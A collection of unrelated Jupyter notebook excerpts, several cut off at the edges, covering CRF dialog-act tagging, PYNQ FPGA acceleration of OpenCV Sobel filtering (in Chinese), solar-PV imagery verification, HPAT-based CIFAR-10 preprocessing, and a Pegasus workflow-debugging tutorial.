def transform(self, dialog):
X, Y = [], []
for idx, utterance in enumerate(dialog):
Y.append(utterance.act_tag)
X.append(self.featurize(idx, dialog))
return X, Y
def train(self, train_dir, model_path):
''' '''
'''
Termianlogy:
directory has dialogues (in each file)
dialogues have utterances (in each line)
uttrances have label, speaker, tokens and the text
'''
dialogs = get_data(train_dir)
for f_name, dialog in dialogs:
X, Y = self.transform(dialog)
self.trainer.append(X, Y)
print("Training and saving model to %s" % model_path)
self.trainer.train(model_path)
print("Done")
def load_model(self, model_file):
self.tagger = crf.Tagger()
self.tagger.open(model_file)
def test(self, test_dir):
dialogs = get_data(test_dir)
for f_name, dialog in dialogs:
X, Y = self.transform(dialog)
predY = self.tagger.tag(X)
assert len(Y) == len(predY)
for i in range(len(Y)):
yield(Y[i], predY[i])
def evaluate(self, dev_dir):
print("Evaluating %s" % dev_dir)
recs = self.test(dev_dir)
matrix = ddict(lambda: ddict(int))
for actual, predicted in recs:
matrix[actual][predicted] += 1
trace = 0
for cls in matrix.keys():
trace += matrix[cls][cls]
tot = 0
for d in matrix.values():
tot += sum(d.values())
return trace / tot, matrix
def predict(self, data_dir, out_file):
dialogs = get_data(data_dir)
with open(out_file, 'w') as out:
for f_name, dialog in dialogs:
out.write('Filename="%s"\n' % f_name.split("/")[-1])
X, _ = self.transform(dialog)
predY = self.tagger.tag(X)
assert len(predY) == len(X)
out.write("\n".join(predY))
out.write("\n\n")
print("Output stored at %s" % out_file)
def train_predict(self, train_dir, data_dir, out_file, model_file="crf_model.data"):
self.train(train_dir, model_file)
self.load_model(model_file)
self.predict(data_dir, out_file)
train_dir = "../data/train"
dev_dir = "../data/dev"
output_file = "output1.txt"
CrfClassifier().train_predict(train_dir, dev_dir, output_file)
!head output1.txt
```
# Advanced CRF
```
%%time
class AdvancedCRF(CrfClassifier):
def featurize(self, idx, dialog):
feats = super(AdvancedCRF, self).featurize(idx, dialog)
# more features here
#feats.append("_bias_")
if idx == len(dialog) - 1:
feats.append("EOD")
pass
if idx == len(dialog) - 2:
feats.append("EOD[-1]")
pass
utter = dialog[idx]
if utter.pos is not None:
for i in range(len(utter.pos)):
feats.append("TOKEN[%d]=%s" % (i, utter.pos[i].token))
feats.append("POS[%d]=%s" % (i, utter.pos[i].pos))
for i in range(len(utter.pos) - 1):
feats.append("TOKEN_%s|TOKEN_%s" % (utter.pos[i].token, utter.pos[i+1].token))
feats.append("POS_%s|POS_%s" % (utter.pos[i].pos, utter.pos[i+1].pos))
if idx > 0:
prev_feats = super(AdvancedCRF, self).featurize(idx-1, dialog)
prev_feats = filter(lambda x: 'POS' in x, prev_feats)
#feats.extend(list(map(lambda x: "PREV_%s" % x, prev_feats)))
if idx < len(dialog) - 1:
#next_feats = super(AdvancedCRF, self).featurize(idx+1, dialog)
#feats.extend(list(map(lambda x: "NEXT_%s" % x, next_feats)))
# add next
pass
return feats
AdvancedCRF(max_iters=50).train_predict(train_dir, dev_dir, output_file)
```
# Evalution
```
def evaluate_output(dev_dir, out_file):
'''evaluates the output'''
index = {}
for fn, dialog in get_data(dev_dir):
index[fn.split('/')[-1]] = [utter.act_tag for utter in dialog]
matrix = ddict(lambda: ddict(int)) # confusion matrix
with open(out_file) as inp:
c = 0
fn = None
for line in map(lambda x: x.strip(), inp):
if line.startswith('Filename='):
fn = line.split('=')[1].replace('"','')
continue
if not line: # end of file
c = 0
continue
pred = line
truth = index[fn][c]
matrix[truth][pred] += 1
c += 1
tot = sum(map(lambda x: sum(x.values()), matrix.values()))
trace = sum(map(lambda x: matrix[x][x], matrix.keys()))
return trace/tot, matrix
perf, dod = evaluate_output(dev_dir, output_file)
print(perf)
pd.DataFrame(dod)
```
| github_jupyter |
# 通过PYNQ加速OPENCV函数(Sobel算子)
在阅读本部分UserGuide时,请确认已做好以下准备:
* 已经按照之前的预备文档安装好依赖环境<br>
* 2根HDMI传输线(对输入视频流以及输出视频流进行测试)
* 一台支持HDMI的显示器(对输入视频流以及输出视频流进行测试)
## 步骤1:加载cv2pynq库
```
import cv2pynq as cv2
```
在正常运行的情况下,可以看到PYNQ板卡标记为“DONE”的LED闪烁(为加载了bit文件的效果);
这是由于在封装的时候,我们在初始化阶段调用了Overlay方法给PYNQ加载了定制的bit文件:
```python
def __init__(self, load_overlay=True):
self.bitstream_name = None
self.bitstream_name = "cv2pynq03.bit"
self.bitstream_path =os.path.join(CV2PYNQ_BIT_DIR,self.bitstream_name)
self.ol = Overlay(self.bitstream_path)
```
上述代码为cv2pynq.py的部分节选,从当中可以看出在初始化的过程中,加载了cv2pynq03.bit,
因此在导入库的时候会出现加载bit文件的效果。加载的bit文件的Block Design如下图所示:

这个Block Design主要由以下三个部分组成:
* HDMI输入输出模块(移植于BaseOverlay)
* 由Vivado HLS生成的OPENCV算法加速IP核(内嵌于Image_Fliter模块)
* 基于AXI总线架构的流传输通道
## 步骤2:对单张图像的处理效果测试
### 步骤2.1:采用原始的OpenCV中的Sobel算子对输入图像进行处理
在进行原始处理效果测试前,我们需要导入以下模块
* 导入原始的OPENCV
* 导入time模块计算处理的时间
* 导入Pillow模块用于读取图像
* 导入numpy模块将jpeg格式的图片转化为数组形式
```
import cv2 as openCV
import time
from PIL import Image
import numpy as np
frame_in = Image.open('../image/lena.jpg')
img_in = np.array(frame_in)
fps_opencv = 0
fps_cv2pynq_with_cma = 0
fps_cv2pynq_without_cma = 0
start = time.time()
for i in range(10):
out_opencv = openCV.Sobel(img_in,-1,1,0,ksize=5)
end = time.time()
img_opencv = Image.fromarray(out_opencv.astype('uint8'))
fps_opencv = 1.0/((end - start)/10)
print("Frames per second using openCV: " + str(fps_opencv))
img_opencv
```
### 步骤2.2:采用cv2pynq中的Sobel算子对输入图像进行处理
```
start = time.time()
for i in range(10):
out_cv2pynq1 = cv2.Sobel(img_in,-1,1,0,ksize=5)
end = time.time()
img_cv2pynq_0 = Image.fromarray(out_cv2pynq1.astype('uint8'))
fps_cv2pynq_without_cma = 1.0/((end - start)/10)
print("Frames per second using cv2pynq without cma: " + str(fps_cv2pynq_without_cma))
img_cv2pynq_0
```
#### CMA&cv2pynq
CMA(Contiguous Memory Allocator)是智能连续内存分配技术,是Linux Kernel内存管理系统的扩展,目的在于解决需要预留大量连续内存导致运行内存紧张的问题。通过对内存的连续分配,cv2pynq可以将图片数据以流的形式传输给PL端,提高图像处理的速率;在PYNQ的原生库中提供了Xlnk类用来分配连续的内存空间,对Xlnk的更多了解,可参考:<br>
https://pynq-testing.readthedocs.io/en/master/pynq_libraries/xlnk.html
```
from pynq import Xlnk
xlnk = Xlnk()
image_buffer = xlnk.cma_array(shape=(512,512), dtype=np.uint8)
out_buffer = xlnk.cma_array(shape=(512,512), dtype=np.uint8)
np.copyto(image_buffer,img_in)
start = time.time()
for i in range(10):
cv2.Sobel(image_buffer,-1,1,0,ksize=5,dst=out_buffer)
end = time.time()
img_cv2pynq_1 = Image.fromarray(out_buffer.astype('uint8'))
fps_cv2pynq = 1.0/((end - start)/10)
print("Frames per second using cv2PYNQ: " + str(fps_cv2pynq))
image_buffer.close()
out_buffer.close()
img_cv2pynq_1
```
## 步骤3:对视频流处理的效果显示
### 步骤3.1:实例化HDMI输入输出接口
在进行cv2pynq的视频流测试之前,我们需要引入视频流,<br>此处由Block Design中设置好的HDMI输入模块传入视频以及输出模块输出经过处理好的视频流信息;<br>关于HDMI输入输出的更多详情,可以参考BaseOverlay中的Video模块;<br>https://github.com/Xilinx/PYNQ/tree/master/boards/Pynq-Z2/base/notebooks/video
<br>https://github.com/Xilinx/PYNQ/tree/master/boards/Pynq-Z1/base/notebooks/video
```
hdmi_in = cv2.video.hdmi_in
hdmi_out = cv2.video.hdmi_out
hdmi_in.configure(cv2.PIXEL_GRAY)
hdmi_out.configure(hdmi_in.mode)
hdmi_in.start()
hdmi_out.start()
print(hdmi_in.mode)
```
在正确的输入视频流信息之后,我们可以得到输入视频流的配置信息;<br>在本实验中,最大支持 1920 * 1080的输入信号。
### 步骤3.2:采用原始的OpenCV中的Sobel算子对输入信号进行处理
```
iterations = 10
start = time.time()
for i in range(iterations):
inframe = hdmi_in.readframe()
outframe = hdmi_out.newframe()
openCV.Sobel(inframe,-1,1,0,ksize=5,dst=outframe)
inframe.freebuffer()
hdmi_out.writeframe(outframe)
end = time.time()
print("Frames per second using OpenCV: " + str(iterations / (end - start)))
```
### 步骤3.3:采用cv2pynq中的Sobel算子对输入信号进行处理
```
import time
iterations = 10
start = time.time()
for i in range(iterations):
inframe = hdmi_in.readframe()
outframe = hdmi_out.newframe()
cv2.Sobel(inframe,-1,1,0,ksize=5,dst=outframe)
inframe.freebuffer()
hdmi_out.writeframe(outframe)
end = time.time()
print("Frames per second using cv2PYNQ: " + str(iterations / (end - start)))
```
### 步骤3.4:释放HDMI驱动
```
hdmi_out.close()
hdmi_in.close()
```
### 步骤3.5:关闭cv2pynq
关闭cv2pynq是一个很重要的步骤,因为在BaseOverlay中的video子系统模块中,图片是以连续的内存数组(contiguous memory arrays)作为存储形式,因此在调用cv2pynq时,可以直接将数据以流的形式传输到PL端。所以避免cv2pynq一直占用连续的内存,必须关于cv2pynq以释放内存,而对连续的内存分配是基于PYNQ的Xlnk库,关于Xlnk的更多详情,可参考:<br>https://pynq.readthedocs.io/en/latest/pynq_libraries/xlnk.html
```
cv2.close()
```
## 附录:PL端是如何加速OPENCV函数处理的
在此项目中式采用一种基于Vivado HLS加速OpenCV程序的方法:<br>其核心是利用Xilinx高层次综合工具Vivado HLS,将C++编写的OpenCV程序按照Vivado HLS处理规范进行修改,进而将代码转换为硬件描述语言,可快速生成IP核。结合Xilinx PYNQ SoC架构,在顶层可直接对我们的Block Design进行Python式的封装,实现OpenCV程序算法向SoC系统的移植和加速。<br>

#### Sobel算子概述
Sobel算子是像素图像边缘检测中最重要的算子之一,在机器学习、数字媒体、计算机视觉等信息科技领域起着举足轻重的作用。在技术上,它是一个离散的一阶差分算子,用来计算图像亮度函数的一阶梯度之近似值。在图像的任何一点使用此算子,将会产生该点对应的梯度矢量或是其法矢量。
#### Sobel算子核心公式(ksize=3)
该算子包含两组3x3的矩阵(当ksize=3时),分别为横向及纵向,将之与图像作平面卷积,即可分别得出横向及纵向的亮度差分近似值。如果以A代表原始图像,Gx及Gy分别代表经横向及纵向边缘检测的图像,其公式如下:
$G_{x}=\begin{bmatrix}
+1&0&-1\\
+2&0&-2\\
+1&0&-1\\
\end{bmatrix}*A$ and
$G_{y}=\begin{bmatrix}
+1&+2&+1\\
0&0&0\\
-1&-2&-1\\
\end{bmatrix}*A$
图像的每一个像素的横向及纵向梯度近似值可用以下的公式结合,来计算梯度的大小。
$G = \sqrt[2]{G_x^2+G_y^2}$
然后可用以下公式计算梯度方向:
$\Theta=arctan(\frac{G_y}{G_x})$
更多关于Sobel算子的详细信息,可参考:<br>https://docs.opencv.org/3.0-beta/doc/tutorials/imgproc/imgtrans/sobel_derivatives/sobel_derivatives.html
#### 在Vivado HLS中映射Sobel算子的结构
在OpenCV中,通过传入dx与dy来求X方向的梯度以及Y方向的梯度从而输出不同方向上的处理结果,
而在从工程中,通过Vivado HLS建立了一个可通用性的卷积核矩阵IP核(fliter2D),其通过接受PS的传输参数来控制卷积核的参数
```python
def Sobel(self,src, ddepth, dx, dy, dst, ksize):
if(ksize == 3):
self.f2D.rows = src.shape[0]
self.f2D.columns = src.shape[1]
self.f2D.channels = 1
if (dx == 1) and (dy == 0) :
if self.filter2DType != 0 :
self.filter2DType = 0
self.f2D.r1 = 0x000100ff #[-1 0 1]
self.f2D.r2 = 0x000200fe #[-2 0 2]
self.f2D.r3 = 0x000100ff #[-1 0 1]
```
上述代码为顶层Python封装时对Sobel函数的部分描述,从中可以获得信息:<br>顶层通过传递dx与dy的值,设置好卷积核的参数,传入IP核(fliter2D)中,此处可看出在dx=1,dy=0时(即Sobel算子在X方向的卷积核)与上面对Sobel算子的描述是相同的,下述代码为在Vivado HLS中对IP核的部分描述:
```C
#include "filter2D_hls.h"
void filter2D_hls(wide_stream* in_stream, wide_stream* out_stream, int rows, int cols, int channels, int mode, ap_uint<32> r1, ap_uint<32> r2, ap_uint<32> r3) {
#pragma HLS INTERFACE axis port *
#pragma HLS INTERFACE s_axilite *
#pragma HLS INTERFACE ap_stable *
#pragma HLS dataflow
GRAY_IMAGE g_img_0(rows,cols);
GRAY_IMAGE g_img_1(rows,cols);
const int col_packets = cols*channels/4;
const int packets = col_packets*rows;
const int pixel_cnt = rows*cols;
for(int r = 0; r < packets; r++){
#pragma HLS pipeline II=4
ap_uint<32> dat = in_stream->data;
g_img_0.write(GRAY_PIXEL(dat.range(7,0)));
++in_stream;
}
const int kernel_size = 3;
hls::Window<kernel_size,kernel_size,ap_int<8> > kernel;
kernel.val[0][0] = r1.range(7,0);
hls::Point_<int> c_point;
c_point.x=-1;
c_point.y=-1;
hls::Filter2D<hls::BORDER_DEFAULT>(g_img_0,g_img_1,kernel, c_point);
for(int r = 0; r < rows; r++){
#pragma HLS pipeline II=4
for(int c = 0; c < col_packets; c++){
ap_uint<32> dat;
dat.range(7,0) = g_img_1.read().val[0];;
out_stream->data = dat;
out_stream->user = (r == 0 && c == 0)? 1: 0;
out_stream->last = (r == rows-1 && c == col_packets-1)? 1: 0;
++out_stream;
}
}
}
```
从Vivado HLS中对IP核的部分描述中,可以得到以下信息:<br>
* 将输入的信息用g_img_0来存储
* 根据PS端传入的r1,r2,r3参数设置卷积核
* 将g_img_0与设置好的卷积核(kernel)进行卷积,卷积结果输出给g_img_1
* 将输出结果赋予out_stream
上述过程简要的描述了Sobel算子在(ksize = 3)的情况下,如何在HLS中编写相应的算法从而生成IP核,并且在上层用Python对IP核进行封装的过程。<br>如要了解更多的关于OpenCV在HLS上的应用,可以参考XAP1167。<br>如需对本UserGuide中的源码有更多的了解,可以参考:<br>https://github.com/xupsh/cv2pynq/blob/XUP/cv2pynq/cv2pynq.py<br>
https://github.com/xupsh/cv2PYNQ-The-project-behind-the-library/blob/master/ip/HLS/filter2D/filter2D_hls.cpp
| github_jupyter |
```
import geopandas as gpd
gpd.options.use_pygeos=False
import os, sys, io
from shapely import geometry
import numpy as np
import matplotlib.pyplot as plt
from area import area
import requests
from functools import partial
from shapely.ops import transform,linemerge, unary_union, polygonize
from shapely.affinity import affine_transform
from functools import partial
import pyproj
from PIL import Image
import descarteslabs as dl
root = os.path.abspath(os.path.join(os.getcwd(),'..','..','..'))
sys.path.append(root)
from solarpv.utils import V_inv
API_KEY = '<your-api-key>'
def img_poly(ft_poly,mmpix):
#V_inv -> lat,lon
#for each point, go centroid->pt
#print(centroid)
img_coords = []
for pt in list(ft_poly.exterior.coords):
#pt->lon,lat
#centroid->lon,lat
dist, angle, dummy = V_inv((ft_poly.centroid.y,ft_poly.centroid.x),(pt[1],pt[0]))
dist=dist*1000
#print ((400+2*(dist/mmpix*np.cos(2.*np.pi*(angle)/360.)),400+2*(dist/mmpix*np.sin(2*np.pi*angle/360.))))
img_coords.append((400+2*(dist/mmpix*np.cos(2.*np.pi*(angle-90.)/360.)),400+2*(dist/mmpix*np.sin(2*np.pi*(angle-90.)/360.))))
#V_inv(point1, point2
#v_dir
return img_coords
def lonlat2pixXY(pt,dt):
lon = pt[0]
lat = pt[1]
Y = (lat-dt[3]-dt[4]/dt[1]*(lon-dt[0]))/(dt[5]-dt[2]*dt[4]/dt[1])
#print Y
X = (lon-dt[0]-Y*dt[2])/dt[1]
#print (lon,dt[0],X)
#print X
return [int(X),int(Y)]
def inspect_sample(row,src = 'google'):
ft_shp = row['geometry']
if ft_shp.type=='MultiPolygon':
run_polys = list(ft_shp)
else:
run_polys = [ft_shp]
for ii_p,ft_poly in enumerate(run_polys):
centroid = ft_poly.centroid ##lon,lat
print ('centroid',centroid)
ft_bbox = ft_poly.bounds
Dx = ft_poly.bounds[2]-ft_poly.bounds[0]
Dy = ft_poly.bounds[3]-ft_poly.bounds[1]
print (max(abs(Dx),abs(Dy)))
ft_box = geometry.box(*ft_poly.buffer(max(abs(Dx),abs(Dy))).bounds)
fig, axs=plt.subplots(1,2,figsize=(24,12))
if src=='google':
box_sides = (V_inv((ft_bbox[1],ft_bbox[0]),(ft_bbox[1],ft_bbox[2]))[0]*1000,
V_inv((ft_bbox[1],ft_bbox[0]),(ft_bbox[3],ft_bbox[0]))[0]*1000)
#print (box_sides)
side_len = np.ceil(max(box_sides))
print ('side_len (m)',side_len)
zoom_dict = dict(zip(range(1,21),[156543.03392 * np.cos(centroid.xy[1][0] * np.pi / 180) / np.power(2, z) for z in range(1,21)]))
#print (zoom_dict) ##<-- METERS PER PIX, not side length
zoom = np.max(np.argwhere(np.array([(zoom_dict[k]*400-max(box_sides)) for k in range(1,21)])>0.))+1
#min(zoom_dict.keys(), key=(lambda k: (zoom_dict[k]-max(box_sides))))
print ('zoom',zoom, zoom_dict[zoom], 'area',area(geometry.mapping(row['geometry'])), np.array(centroid))
pix_poly = img_poly(ft_poly,zoom_dict[zoom])
urlstr = ''.join(["""https://maps.googleapis.com/maps/api/staticmap?center=""",
str(centroid.xy[1][0])+""","""+str(centroid.xy[0][0]),
"""&zoom="""+str(zoom),
"""&size=400x400&scale=2&maptype=satellite&format=png&key=""", str(API_KEY)])
r = requests.get(urlstr, allow_redirects=True)
#print (r.content)
image_data = r.content
image = Image.open(io.BytesIO(image_data))
image = image.convert('RGB')
arr = np.asarray(image)
axs[0].imshow(arr)
xs, ys = geometry.Polygon(pix_poly).exterior.xy
#print (geometry.Polygon(pix_poly))
#print (xs,ys)
axs[0].plot(xs,ys, color='c', linewidth=2.)
axs[0].set_title('Google Basemap (indeterminate date), {:.2f}m/px'.format(zoom_dict[zoom]), fontsize=20)
elif src=='SPOT':
scenes, ctx = dl.scenes.search(
ft_box,
products=['airbus:oneatlas:spot:v2'],
start_datetime='2015-09-01', end_datetime='2018-12-31', cloud_fraction=0.2, limit=10, processing_level='surface'
)
scenes = sorted(scenes, key=lambda k: k.properties.date, reverse=True)
print ([s.properties.date for s in scenes])
arr_SPOT = scenes[0].ndarray("red green blue", ctx)
for s in scenes[1:]:
fill_por = np.sum(arr_SPOT>0)/np.prod([*arr_SPOT.shape])
#print (fill_por, np.sum(arr_S2), np.prod([*arr_S2.shape]))
new_arr = s.ndarray("red green blue", ctx)
#print ('shapes',new_arr.shape, np.sum(new_arr>0))
arr_SPOT[new_arr.mask==False]=new_arr.data[new_arr.mask==False]
scene_crs = scenes[0].properties['crs']
dt = scenes[0].properties['geotrans']
dt_shapely = [dt[1],dt[2],dt[4],dt[5],dt[0],dt[3]]
WGS84 = "+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs"
wgs_proj = pyproj.Proj(WGS84)
utm_proj = pyproj.Proj("+init="+scene_crs, preserve_units=True)
dt[0] = utm_proj(*ctx.bounds[0:2])[0]
dt[3] = utm_proj(*ctx.bounds[2:])[1]
projection_func = partial(pyproj.transform, wgs_proj, utm_proj)
utm_poly = transform(projection_func, ft_poly)
pix_poly = geometry.Polygon([lonlat2pixXY(c,dt) for c in list(utm_poly.exterior.coords)])
axs[0].imshow((np.swapaxes(np.swapaxes(arr_SPOT.data,0,2),0,1)/256).clip(0.,1.))
xs,ys = pix_poly.exterior.xy
axs[0].plot(xs,ys,c='c',linewidth=2)
axs[0].set_title('SPOT {}, 10m/px, , {:d}x{:d}px'.format(scenes[0].properties.date,arr_SPOT.shape[1],arr_SPOT.shape[2]), fontsize=20)
scenes, ctx = dl.scenes.search(
ft_box,
products=['sentinel-2:L1C'],
start_datetime='2018-09-01', end_datetime='2018-12-31', cloud_fraction=0.2, limit=10,
)
if len(scenes)>0:
scenes = sorted(scenes, key=lambda k: k.properties.cloud_fraction, reverse=False)
arr_S2 = scenes[0].ndarray("red green blue", ctx)
for s in scenes[1:]:
fill_por = np.sum(arr_S2>0)/np.prod([*arr_S2.shape])
#print (fill_por, np.sum(arr_S2), np.prod([*arr_S2.shape]))
new_arr = s.ndarray("red green blue", ctx)
#print ('shapes',new_arr.shape, np.sum(new_arr>0))
arr_S2[new_arr.mask==False]=new_arr.data[new_arr.mask==False]
scene_crs = scenes[0].properties['crs']
dt = scenes[0].properties['geotrans']
dt_shapely = [dt[1],dt[2],dt[4],dt[5],dt[0],dt[3]]
WGS84 = "+proj=longlat +ellps=WGS84 +datum=WGS84 +no_defs"
wgs_proj = pyproj.Proj(WGS84)
utm_proj = pyproj.Proj("+init="+scene_crs, preserve_units=True)
dt[0] = utm_proj(*ctx.bounds[0:2])[0]
dt[3] = utm_proj(*ctx.bounds[2:])[1]
projection_func = partial(pyproj.transform, wgs_proj, utm_proj)
utm_poly = transform(projection_func, ft_poly)
pix_poly = geometry.Polygon([lonlat2pixXY(c,dt) for c in list(utm_poly.exterior.coords)])
axs[1].imshow((np.swapaxes(np.swapaxes(arr_S2.data,0,2),0,1)/10000*2.5).clip(0.,1.))
xs,ys = pix_poly.exterior.xy
axs[1].plot(xs,ys,c='c',linewidth=2)
axs[1].set_title('Sentinel-2 (Q4 2018), 1.5m/px, , {:d}x{:d}px'.format(arr_S2.shape[1],arr_S2.shape[2]), fontsize=20)
fig.suptitle(f'uid: {row["unique_id"]},lon:{row["geometry"].representative_point().x:.5f},lat:{row["geometry"].representative_point().y:.5f}', fontsize=26)
#plt.tight_layout()
fig.savefig(os.path.join(root,'data','hand_verify',str(row['unique_id'])+'.png'))
#plt.show()
plt.close()
return True
gdf = gpd.read_file(os.path.join(root,'data','ABCD_finalized.geojson'))
import glob
pos_labels = glob.glob(os.path.join(root,'data','hand_verify','pos','*'))
neg_labels = glob.glob(os.path.join(root,'data','hand_verify','neg','*'))
ind_labels = glob.glob(os.path.join(root,'data','hand_verify','ind','*'))
all_ids = [f.split('/')[-1].split('.')[0] for f in pos_labels+neg_labels+ind_labels]
all_ids
1e4
bins = [1e2,1e3,1e4,1e5,1e6,1e9]
slice_ids = [int(ii) for ii in all_ids]
for ii in range(len(bins)-1):
print (ii,((gdf['area']>bins[ii]) & (gdf['area']<=bins[ii+1])).sum())
for ii in range(len(bins)-1):
print (len(gdf.loc[gdf['unique_id'].isin(slice_ids) & (gdf['area']>bins[ii]) &(gdf['area']<=bins[ii+1]),:]))
ids = {ii:gdf.loc[(gdf['area']>bins[ii]) &(gdf['area']<=bins[ii+1]),'unique_id'].values.tolist() for ii in range(len(bins)-1)}
np.random.choice(range(7),3)
ids_0 = np.random.choice(ids[0],0).tolist()
ids_3 = np.random.choice(ids[3],0).tolist()
ids_4 = np.random.choice(ids[4],10).tolist()
#inspect_set = gdf.iloc[np.random.choice(range(len(gdf)),N_inspect),:]
inspect_set = gdf.loc[gdf['unique_id'].isin(ids_0+ids_3+ids_4),:]
for row in inspect_set.iterrows():
print (row[0])
for row in inspect_set.iloc[0:,].iterrows():
print (row[0])#['unique_id'])
inspect_sample(row[1],src = 'google')
```
### Assess final
```
pos_ids = [int(f.split('/')[-1].split('.')[0]) for f in pos_labels]
neg_ids = [int(f.split('/')[-1].split('.')[0]) for f in neg_labels]
precision_dict = {}
for ii in range(len(bins)-1):
pos = ((gdf['unique_id'].isin(pos_ids)) & (gdf['area']>bins[ii]) & (gdf['area']<=bins[ii+1])).sum()
neg = ((gdf['unique_id'].isin(neg_ids)) & (gdf['area']>bins[ii]) & (gdf['area']<=bins[ii+1])).sum()
mu = pos/(pos+neg)
twosigma = 1.96/2/np.sqrt(pos+neg)
precision_dict[ii] = {
'ii':ii,
'm':pos,
'N':neg+pos,
'mu':mu,
'2sigma':twosigma
}
print (ii,pos,neg, mu, twosigma)
#m /n +- 1.96/2/sqrt(n)
pos = len(gdf[gdf['unique_id'].isin(pos_ids)])
neg = len(gdf[gdf['unique_id'].isin(neg_ids)])
print (pos,neg, pos/(pos+neg))
(478+196+194)/(478+196+194+13)
#https://math.stackexchange.com/questions/462404/regarding-calculating-the-bias-of-coin-with-uncertainty
```
| github_jupyter |
### Prepare Data
Install pytorch and torchvision:
```bash
conda install pytorch torchvision -c pytorch
```
Download cifar10 data and save to a simple binary file:
```
import torchvision
import os, pickle
import numpy as np
def create_dataset():
trainset = torchvision.datasets.CIFAR10(root='./data', download=True)
fname = "./data/cifar-10-batches-py/data_batch_1"
fo = open(fname, 'rb')
entry = pickle.load(fo, encoding='latin1')
train_data = entry['data']
fo.close()
train_data.tofile("train_data.dat")
create_dataset()
```
Now we load and transform the input data using HPAT:
```
import time
import hpat
from hpat import prange
import cv2
hpat.multithread_mode = True
cv2.setNumThreads(0) # we use threading across images
@hpat.jit(locals={'images:return': 'distributed'})
def read_data():
file_name = "train_data.dat"
blob = np.fromfile(file_name, np.uint8)
# reshape to images
n_channels = 3
height = 32
width = 32
n_images = len(blob)//(n_channels*height*width)
data = blob.reshape(n_images, height, width, n_channels)
# resize
resize_len = 224
images = np.empty((n_images, resize_len, resize_len, n_channels), np.uint8)
for i in prange(n_images):
images[i] = cv2.resize(data[i], (resize_len, resize_len))
# convert from [0,255] to [0.0,1.0]
# normalize
u2f_ratio = np.float32(255.0)
c0_m = np.float32(0.485)
c1_m = np.float32(0.456)
c2_m = np.float32(0.406)
c0_std = np.float32(0.229)
c1_std = np.float32(0.224)
c2_std = np.float32(0.225)
for i in prange(n_images):
images[i,:,:,0] = (images[i,:,:,0]/ u2f_ratio - c0_m) / c0_std
images[i,:,:,1] = (images[i,:,:,1]/ u2f_ratio - c1_m) / c1_std
images[i,:,:,2] = (images[i,:,:,2]/ u2f_ratio - c2_m) / c2_std
# convert to CHW
images = images.transpose(0, 3, 1, 2)
return images
t1 = time.time()
imgs = read_data()
print("data read time", time.time()-t1)
```
The `'V:return':'distributed'` annotation indicates that chunks of array `V` are returned in distributed fashion, instead of replicating it which is the default behavior for return. The I/O function `np.fromfile`, as well as all operations on images are parallelized by HPAT.
Let's run a simple resnet18 DNN using pretrained weights as an example. We run only on 100 images for faster demonstration.
```
from torch import Tensor
from torch.autograd import Variable
model = torchvision.models.resnet18(True)
t1 = time.time()
res = model(Variable(Tensor(imgs[:100])))
print("dnn time", time.time()-t1)
```
Now we use HPAT to get some statistics on the results.
```
# get top class stats
vals, inds = res.max(1)
import pandas as pd
@hpat.jit(locals={'vals:input': 'distributed', 'inds:input': 'distributed'})
def get_stats(vals, inds):
df = pd.DataFrame({'vals': vals, 'classes': inds})
stat = df.describe()
print(stat)
TRUCK = 717
print((inds == TRUCK).sum())
get_stats(vals.data.numpy(), inds.data.numpy())
```
Similar to distributed return annotation, distributed inputs are annotated as well.
| github_jupyter |
# Workflow Debugging
When running complex computations (such as workflows) on complex computing infrastructure (for example HPC clusters), things will go wrong. It is therefore important to understand how to detect and debug issues as they appear. The good news is that Pegasus is doing a good job with the detection part, using for example exit codes, and provides tooling to help you debug. In this notebook, we will be using the same workflow as in the previous one, but introduce an error and see if we can detect it.
First, let's clean up some files so that we can run this notebook multiple times:
```
!rm -f f.a
```

```
import logging
from pathlib import Path
from Pegasus.api import *
logging.basicConfig(level=logging.DEBUG)
# --- Properties ---------------------------------------------------------------
props = Properties()
props["pegasus.monitord.encoding"] = "json"
props["pegasus.catalog.workflow.amqp.url"] = "amqp://friend:donatedata@msgs.pegasus.isi.edu:5672/prod/workflows"
props["pegasus.mode"] = "tutorial" # speeds up tutorial workflows - remove for production ones
props.write() # written to ./pegasus.properties
# --- Replicas -----------------------------------------------------------------
with open("f-problem.a", "w") as f:
f.write("This is sample input to KEG")
fa = File("f.a").add_metadata(creator="ryan")
rc = ReplicaCatalog().add_replica("local", fa, Path(".").resolve() / "f.a")
# --- Transformations ----------------------------------------------------------
preprocess = Transformation(
"preprocess",
site="condorpool",
pfn="/usr/bin/pegasus-keg",
is_stageable=False,
arch=Arch.X86_64,
os_type=OS.LINUX
)
findrange = Transformation(
"findrange",
site="condorpool",
pfn="/usr/bin/pegasus-keg",
is_stageable=False,
arch=Arch.X86_64,
os_type=OS.LINUX
)
analyze = Transformation(
"analyze",
site="condorpool",
pfn="/usr/bin/pegasus-keg",
is_stageable=False,
arch=Arch.X86_64,
os_type=OS.LINUX
)
tc = TransformationCatalog().add_transformations(preprocess, findrange, analyze)
# --- Workflow -----------------------------------------------------------------
'''
[f.b1] - (findrange) - [f.c1]
/ \
[f.a] - (preprocess) (analyze) - [f.d]
\ /
[f.b2] - (findrange) - [f.c2]
'''
wf = Workflow("blackdiamond")
fb1 = File("f.b1")
fb2 = File("f.b2")
job_preprocess = Job(preprocess)\
.add_args("-a", "preprocess", "-T", "3", "-i", fa, "-o", fb1, fb2)\
.add_inputs(fa)\
.add_outputs(fb1, fb2)
fc1 = File("f.c1")
job_findrange_1 = Job(findrange)\
.add_args("-a", "findrange", "-T", "3", "-i", fb1, "-o", fc1)\
.add_inputs(fb1)\
.add_outputs(fc1)
fc2 = File("f.c2")
job_findrange_2 = Job(findrange)\
.add_args("-a", "findrange", "-T", "3", "-i", fb2, "-o", fc2)\
.add_inputs(fb2)\
.add_outputs(fc2)
fd = File("f.d")
job_analyze = Job(analyze)\
.add_args("-a", "analyze", "-T", "3", "-i", fc1, fc2, "-o", fd)\
.add_inputs(fc1, fc2)\
.add_outputs(fd)
wf.add_jobs(job_preprocess, job_findrange_1, job_findrange_2, job_analyze)
wf.add_replica_catalog(rc)
wf.add_transformation_catalog(tc)
```
## 2. Run the Workflow
```
try:
wf.plan(submit=True)\
.wait()
except PegasusClientError as e:
print(e)
```
## 3. Analyze
If the workflow failed you can use `wf.analyze()` do get help finding out what went wrong.
```
try:
wf.analyze()
except PegasusClientError as e:
print(e)
```
In the output we can see `Expected local file does not exist: /home/scitech/notebooks/02-Debugging/f.a` which tells us that an input did not exist. This is because we created it with the wrong name (`f-problem.a`) instead of the intended name (`f.a`).
## 3. Resolving the issue
Let's resolve the issue by renaming the wrongly named input file:
```
